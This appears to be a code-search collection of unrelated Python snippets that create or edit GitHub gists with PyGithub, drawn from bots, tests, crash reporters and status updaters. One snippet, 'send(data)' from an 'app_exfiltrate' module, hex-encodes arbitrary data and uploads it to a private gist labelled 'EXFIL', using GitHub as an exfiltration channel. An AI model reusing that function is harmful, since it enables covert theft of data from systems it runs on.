def _search_inner(self, query: str) -> str: log.debug(f"Searching {self.name} for {query!r}.") styled_name = ircstyle.style(self.name, italics=True, reset=True) response = self._search(query) df = response["results"] if df is None: # Note: Explicit check prevents: ValueError: The truth value of a DataFrame is ambiguous styled_query = ircstyle.style(query, italics=True, reset=True) response_ = f"0 {styled_name} search results for {styled_query}. For help, see {self._syntax_help}" return response_ markdown_df = df.copy() markdown_df.insert(0, "date_utc", markdown_df["datetime"].dt.date) markdown_df["title"] = "[" + markdown_df["title"].str.replace( "|", r"\|") + "](" + markdown_df["long_url"] + ")" markdown_df.drop(columns=["datetime", "long_url", "short_url"], inplace=True) truncation_indicator = "max" if response["truncated"] else "all" gist = self._github_user.create_gist( public=False, files={ "results.md": github.InputFileContent( markdown_df.to_markdown(index=False, tablefmt="github")), "results.csv": github.InputFileContent(df.to_csv(index=False)), }, description= f"{query}: {truncation_indicator} {len(df)} search results from {self.name}", ) styled_query = ircstyle.style(query, italics=True, reset=False) response = f"{truncation_indicator.capitalize()} {len(df)} search results → {gist.html_url}#file-results-md (from {styled_name} for {styled_query})" return response
def publish_as_gist_file(ctx, path, name="index"): github_config = get_github_config(ctx) user = github_config._github.get_user() content = open(path, "r").read() content_file = github.InputFileContent(content) gist = user.create_gist(False, {name: content_file}) return gist.files[name].raw_url
def _generate_payload(self): " Gather payload to sent to Github. " gfile = self._get_notebook_file() file = github.InputFileContent(self.notebook_content) files = {gfile.filename: file} description = self._generate_description() return {'files':files, 'description': description}
def testCreateGistWithoutDescription(self): gist = self.user.create_gist( True, {"foobar.txt": github.InputFileContent("File created by PyGithub")} ) self.assertEqual(gist.description, None) self.assertEqual(list(gist.files.keys()), ["foobar.txt"]) self.assertEqual(gist.files["foobar.txt"].content, "File created by PyGithub")
def create_private_gist(config, main_github_token, filename, content, description): g = Github(main_github_token) g_user = g.get_user() gist = g_user.create_gist(False, {filename: github.InputFileContent(content)}, description) # gists have a list of files associated with them, we just want the first one # gist.files = {'filename': GistFile(filename), ...} gist_file = [x for x in gist.files.values()][0] config["gist_raw_contents_url"] = gist_file.raw_url # The structure of the url is: # https://gist.githubusercontent.com/<username>/<gist guid>/raw/<file guid>/<filename.txt> # # Since we're only uploading one file and we want to make the URL as concise as possible, # it turns out we can actually trim off everything after /raw/ and it'll still give us what # we want. config["gist_raw_contents_url"] = config["gist_raw_contents_url"].split( "/raw/")[0] + "/raw" print("[*] Private gist content at:") print("- %s" % config["gist_raw_contents_url"]) return config
def create_gist(self, name, tags, content='', public=True): desc = "{name} #notebook {tags}".format(name=name, tags=" ".join(tags)) file = github.InputFileContent(content) files = {"{name}.ipynb".format(name=name): file} gist = self.hub.get_user().create_gist(public, files, desc) tg = TaggedGist.from_gist(gist) self._tagged_gists[tg.id] = tg return tg
def _github_files(files): """ wrap basestring content into github.InputFilecontent """ new_files = {} for fn, content in files.items(): if isinstance(content, compat.string_types): content = github.InputFileContent(content) new_files[fn] = content return new_files
def testCreateGist(self): gist = self.user.create_gist( True, { "foobar.txt": github.InputFileContent("File created by PyGithub") }, "Gist created by PyGithub on a NamedUser") self.assertEqual(gist.description, "Gist created by PyGithub on a NamedUser")
def write_last_tweet_id(tweet_id): try: gist.edit( description="using for heroku", files={"last_post": github.InputFileContent(content=tweet_id)}, ) except: log.exception("Error writing tweet ID")
def testEditWithAllParameters(self): gist = self.g.get_gist("2729810") gist.edit( "Description edited by PyGithub", {"barbaz.txt": github.InputFileContent("File also created by PyGithub")}, ) self.assertEqual(gist.description, "Description edited by PyGithub") self.assertEqual(gist.updated_at, datetime.datetime(2012, 5, 19, 7, 6, 10)) self.assertEqual(set(gist.files.keys()), {"foobar.txt", "barbaz.txt"})
def testRenameFile(self): gist = self.g.get_gist("5339374") self.assertEqual(list(gist.files.keys()), ["bar.txt"]) gist.edit( files={ "bar.txt": github.InputFileContent(gist.files["bar.txt"].content, new_name="baz.txt") }) self.assertEqual(list(gist.files.keys()), ["baz.txt"])
def testEditWithAllParameters(self): self.gist.edit("Description edited by PyGithub", { "barbaz.txt": github.InputFileContent("File also created by PyGithub") }) self.assertEquals(self.gist.description, "Description edited by PyGithub") self.assertEquals(self.gist.updated_at, datetime.datetime(2012, 5, 19, 7, 6, 10)) self.assertEquals(self.gist.files.keys(), ["foobar.txt", "barbaz.txt"])
def new_gist(self, *, user: str, filename: str, content: bytes, access_token: str, public: bool, **kwargs) -> str: if not access_token: raise MissingDataError('access token is required') files_content = { filename: github.InputFileContent(content.decode('utf-8')) } client = github.Github(access_token) gist = client.get_user().create_gist(public, files=files_content) return gist.id
def createGist(self, gistName): #Define gist name and content files = { str(gistName) : github.InputFileContent('Hello Beautiful!') } descriptionStr = 'Gist for sending Love Messages' #Create gist gistReturn = self.gh.get_user().create_gist(False, files, descriptionStr) #Get ID gistID = gistReturn.id return gistID
def publish_as_gist_file(ctx, path, name="index"): """Publish a gist. More information on gists at http://gist.github.com/. """ github_config = get_github_config(ctx) user = github_config._github.get_user() content = open(path, "r").read() content_file = github.InputFileContent(content) gist = user.create_gist(False, {name: content_file}) return gist.files[name].raw_url
def push_local_file_content(self, *, user: str, repo: str, remote_file: str, local_file_content: bytes, access_token: str, **kwargs) -> str: if not access_token: raise MissingDataError('access token is required') gist = get_gist(repo, access_token) files_content = { remote_file: github.InputFileContent(local_file_content.decode('utf-8')) } gist.edit(files=files_content) return gist.history[0].version
def update_or_create_gist(gists, gist_mapping, stdout_path, stderr_path): to_send = {} to_send_hashes = {} for key, path in [('stderr', stderr_path), ('stdout', stdout_path)]: with open(path, 'rb') as fh: if max_gist_mb is None: contents = fh.read() else: if max_gist_mb <= 0: contents = '' else: contents = utils.read_backwards_up_to_chop( fh, units.Mi * max_gist_mb) contents = contents.strip() if contents: name = gist_mapping[key] to_send[name] = github.InputFileContent(contents) hasher = hashlib.new("md5") hasher.update(contents) to_send_hashes[key] = hasher.hexdigest() if gists and to_send: _gist, gist_hashes = gists[0] if gist_hashes == to_send_hashes: # Don't bother sending anything if nothing has changed... to_send.clear() if to_send: just_made = False try: if gists: gist, gist_hashes = gists[0] gist.edit(files=to_send) gist_hashes.update(to_send_hashes) else: just_made = True me = self.bot.clients.github_client.get_user() gist = me.create_gist(True, to_send) gists.append((gist, to_send_hashes)) except Exception: if just_made: LOG.warn("Failed uploading new gist for run of %s", playbook, exc_info=True) else: LOG.warn("Failed uploading edit of gist" " for run of %s", playbook, exc_info=True) else: if just_made and gists: gist, _gist_hashes = gists[0] replier("Gist url at: %s" % gist.html_url)
def get_files(dir_info: DirectoryInfo, config_builder: ConfigBuilder, logger): '''get the files as a dict which use as argument for github api.''' update_content = {} for item in dir_info.list_items(): if not isinstance(item, FileInfo): continue if item.path.name == GIST_CONFIG_NAME: continue if isinstance(item, FileInfo): update_content[item.path.name] = github.InputFileContent(item.read_text()) config_builder.add_file(item) return update_content
def _run(self, group): replier = self.message.reply_text ldap_client = self.bot.clients.ldap_client group_members = [ ldap_utils.explode_member(member) for member in ldap_client.list_ldap_group(group) ] group_members = sorted(group_members, key=lambda m: m.get("CN")) tbl_headers = ['CN', 'DC', 'OU'] rows = [] for member in group_members: row = [] for k in tbl_headers: v = member.get(k) if isinstance(v, list): v = ", ".join(v) row.append(v) rows.append(row) if len(group_members) <= self.max_before_gist: lines = [ "```", tabulate.tabulate(rows, headers=tbl_headers), "```", ] replier("\n".join(lines), threaded=True, prefixed=False) else: github_client = self.bot.clients.github_client me = github_client.get_user() to_send = {} upload_what = [ ('listing', tabulate.tabulate(rows, headers=tbl_headers)), ] for what_name, contents in upload_what: # Github has upper limit on postings to 1MB contents = _chop(contents, units.Mi) contents = contents.strip() name = what_name + ".txt" to_send[name] = github.InputFileContent(contents) if to_send: try: gist = me.create_gist(True, to_send) except Exception: LOG.warning( "Failed uploading gist for listing" " of '%s' ldap group", group) else: lines = [ "Gist url at: %s" % gist.html_url, ] replier("\n".join(lines), threaded=True, prefixed=False)
def upload_log_file(self, log_content, gh, username, is_basic): try: QtWidgets.qApp.setOverrideCursor(QtCore.Qt.WaitCursor) '''data = { "public": True, "files": { "Osdag_crash_log.log": { "content": log_content }, } } if is_basic: auth = gh.get_user() ret = auth.create_gist(True, {"Osdag_crash_log.log": github.InputFileContent(log_content)},"Osdag crash report.") ret = str(ret.id) ret = 'https://gist.github.com/' + ret else: query_url = "https://api.github.com/gists" headers = {'Authorization': f'token {username}'} r = requests.post(query_url, headers=headers, data=json.dumps(data)) ret = r.json() ret = ret['html_url']''' auth = gh.get_user() ret = auth.create_gist( True, {"Osdag_crash_log.log": github.InputFileContent(log_content)}, "Osdag crash report.") ret = str(ret.id) ret = 'https://gist.github.com/' + ret QtWidgets.qApp.restoreOverrideCursor() except Exception as e: QtWidgets.qApp.restoreOverrideCursor() QtWidgets.QMessageBox.warning( self.parent_widget, 'Error', 'Unable to create gist. {}'.format(type(e).__name__) + "\n \n" + "NOTE: If you are using Two Factor Authentication. Please Sign in using Access Token." ) if is_basic: self.qsettings().setValue('github/remember_credentials', 0) else: self.qsettings().setValue('github/remember_token', 0) return None else: return ret
def post_results_to_gist(db, results) -> Optional[github.Gist.Gist]: # Posts to botleague-results gist if blconfig.is_test or get_test_name_from_callstack(): log.info('DETECTED TEST MODE: Not uploading results.') ret = None else: github_client = Github( decrypt_symmetric( db.get(constants.BOTLEAGUE_RESULTS_GITHUB_TOKEN_NAME))) # TODO: Need to use access_token header instead of query param by # July! ret = github_client.get_user().create_gist( public=True, files={ 'results.json': github.InputFileContent(results.to_json(indent=2)) }, description='Automatically uploaded by botleague liaison') return ret
def _run(self, thing): github_client = self.bot.clients.github_client elastic_client = self.bot.clients.elastic_client replier = functools.partial(self.message.reply_text, threaded=True, prefixed=False) replier("Initiating scan for `%s`." % thing) to_send = {} for index, query_tpl in self.index_and_query: query = query_tpl % {'thing': thing} replier("Scanning index `%s` using query `%s`." % (index, query)) s = (e_dsl.Search(using=elastic_client).query( "query_string", query=query).sort("-@timestamp").index(index)) s_buf = six.StringIO() for i, h in enumerate(s.scan()): h_header = "Hit %s" % (i + 1) h_header_delim = "-" * len(h_header) h_header += "\n" h_header += h_header_delim h_header += "\n" s_buf.write(h_header) s_buf.write(_format_hit(h)) s_buf.write("\n") # Github has upper limit on postings to 1MB s_buf = self._chop(s_buf, units.Mi) if s_buf: # Because github... s_buf_name = re.sub(r"\.|\-|\*|_", "", index) s_buf_name = s_buf_name + ".txt" to_send[s_buf_name] = ghe.InputFileContent(s_buf) if not to_send: replier("No scan results found.") else: replier("Uploading %s scan results to gist." % len(to_send)) me = github_client.get_user() gist = me.create_gist(True, to_send) replier("Gist url at: %s" % gist.html_url)
def send(data): app_exfiltrate.log_message('info', "[github] Sending {} bytes with Github".format(len(data))) g.get_user().create_gist(False, {'foobar.txt': github.InputFileContent(data.encode('hex'))}, 'EXFIL')
# STEP 2 - post tweet with a reference to uploaded image if r.status_code == 200: media_id = r.json()['media_id'] r = api.request('statuses/update', { 'status': tweet, 'media_ids': media_id }) if r.status_code == 200: twitterPostData = json.loads(r.text) print(' : SUCCESS: Tweet posted') # Append to the state database stateDb[chosenMemory['title']] = { "tweet_id": twitterPostData['id'], "posted_on": datetime.now().isoformat() } gist.edit( files={ "state.json": github.InputFileContent( content=json.dumps(stateDb, indent=2)) }) print(" : State DB updated") else: raise SystemExit(f" : FAILURE: Tweet not posted: {r.text}")
timelineList = api.user_timeline(id='YOURTWITTERID', count=1) timeline = timelineList[0] json_str = json.dumps(timeline._json) json_str = json.loads(json_str) like_amount = str(json_str['favorite_count']) retweet_amount = str(json_str['retweet_count']) title = "@YOUR@HERE - ❤️{}|↪️{}".format(like_amount, retweet_amount) content = str(json_str['text']) final_content = """""" i = 0 for each in content: final_content += each if i == 55: final_content += '\n' i += 1 last_title = str(gist.files).split("'")[1] gist.edit( files={last_title:github.InputFileContent(content=final_content, new_name=title)}, ) upload_amount += 1 os.system('cls') print(crayons.red(""" Updated! Title: {} Content: {} Time Wait: 15 min Upload Count: {} """.format(title, content, upload_amount))) time.sleep(15 * 60)
except KeyboardInterrupt: raw_input('Press enter to exit cp2gh') sys.exit(-1) if not encoding: encodings = ['utf8', 'cp1252'] for encoding in encodings: try: content = contentOrig.decode(encoding) break except UnicodeDecodeError: content = contentOrig else: content = contentOrig.decode(encoding) gist_files[attachment[0]] = github.InputFileContent(content) continuations = [] if len(body) >= (32*1024): continuations = textwrap.wrap(body, 32*1024) body = continuations.pop(0) if gist_files: created = False while not created: try: g = user.create_gist(True, gist_files, 'CodePlex Issue #%d Plain Text Attachments' % row[0]) body += '\n\n#### Plaintext Attachments\n\n[%s](%s)' % (g.description, g.html_url) created = True except: print '\tError creating gist, retrying in 2 seconds'
fileName = f"{_date}-reporte-vespertino-covid-19.pdf" status = download_file(url, fileName) pre_date = d.strftime('%d-%m-%Y') print(f"{fileName} downloaded...status {status} and date to update is {pre_date}") if status: data = parser_data(fileName) if data[1] != 0 and data[3] != 0 and data[0] != 0: total_negatives = int(data[3]) - int(data[0]) new_data.append([pre_date, data[1], total_negatives, data[3]]) df = pd.DataFrame(new_data, columns=["date", "recovered", "negative_tests", "total_tests"]) new_df = pd.concat([df2, df]) df_to_csv = new_df.drop_duplicates(subset=['date'], keep='last') df_to_csv.to_csv('aux-covid-19-arg.csv', index=False) f = io.open("aux-covid-19-arg.csv", mode="r", encoding="utf-8") token = "" gh = github.Github(token) gist = gh.get_gist("") update_date = (edate.strftime('%d-%m-%y')) gist.edit( description=f"Updated csv on {update_date}", files={"aux-covid-19-arg.csv": github.InputFileContent(content=f.read())}, )
#Get Track name top_track = base_url['toptracks']['track'][x]['name'] #Make the spaces equal. F***s up if the artist has a symbol if len(top_artist) < 24: amount = 24 - len(top_artist) top_artist = top_artist + " "* amount #Make the spaces equal. F***s up if the artist has a symbol if len(top_track) < 27: amount = 27 - len(top_track) top_track = top_track + " "* amount #Make the finishing content content += top_artist + "| " + top_track + "Plays:" + play_count + "\n" #update the gist! last_title = str(gist.files).split("'")[1] new_title = '{} | Playcount: {}'.format(username, playcount) gist.edit( files={last_title: github.InputFileContent(content=content, new_name=new_title)}, ) except: pass times += 1 os.system('cls') print (crayons.red(""" Uploaded Content Times: {} Now waiting: 20 min """.format(str(times)))) content = """""" time.sleep(1200) os.system('cls')